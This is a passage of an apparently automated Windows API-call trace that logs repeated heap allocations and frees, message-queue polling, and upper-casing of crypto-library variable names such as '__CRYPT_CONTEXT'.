hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0180.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0180.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0180.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0180.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0180.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0180.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0180.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0180.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0180.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0180.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0180.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0180.155] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0180.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0180.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0180.155] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0180.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0180.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0180.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0180.155] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0180.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0180.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0180.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0180.156] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0180.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0180.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0180.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0180.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0180.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0180.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0180.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0180.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0180.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0180.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0180.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0180.156] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0180.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0180.156] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0180.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0180.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0180.156] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0180.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0180.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0180.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0180.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0180.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0180.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0180.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0180.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0180.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0180.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0180.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0180.157] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0180.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0180.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0180.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0180.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0180.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0180.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0180.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0180.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0180.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0180.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0180.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0180.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0180.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0180.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0180.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0180.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0180.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0180.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0180.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0180.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0180.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0180.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0180.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0180.159] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0180.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0180.159] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0180.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0180.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0180.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0180.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0180.159] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0180.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0180.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0180.159] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0180.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0180.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0180.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0180.159] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0180.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0180.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0180.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0180.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0180.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0180.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0180.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0180.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0180.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0180.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0180.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0180.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0180.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0180.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0180.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0180.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0180.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0180.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0180.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0180.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0180.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0180.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0180.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0180.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0180.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0180.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0180.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0180.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0180.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0180.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0180.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0180.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0180.160] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0180.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0180.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0180.160] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0180.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0180.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0180.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0180.160] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0180.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0180.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0180.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0180.161] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0180.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0180.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0180.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0180.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0180.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0180.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0180.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0180.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0180.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0180.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0180.161] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0180.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0180.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0180.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0180.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0180.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0180.161] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0180.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0180.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0180.161] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0180.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0180.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0180.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0180.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0180.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0180.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0180.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0180.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0180.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0180.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0180.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0180.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0180.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0180.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0180.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0180.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0180.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0180.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0180.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0180.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0180.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0180.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0180.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0180.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0180.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0180.162] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0180.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0180.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0180.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0180.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0180.162] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0180.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0180.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0180.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0180.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0180.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0180.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0180.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0180.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0180.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0180.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0180.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0180.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0180.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0180.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0180.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0180.163] RtlAllocateHeap 